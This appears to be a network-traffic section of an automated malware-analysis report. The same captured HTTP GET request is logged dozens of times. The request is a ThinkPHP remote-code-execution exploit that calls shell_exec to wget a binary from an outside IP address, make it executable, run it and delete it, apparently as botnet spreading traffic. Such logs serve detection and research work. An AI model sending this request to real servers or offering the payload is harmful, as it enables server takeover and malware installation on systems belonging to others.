    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
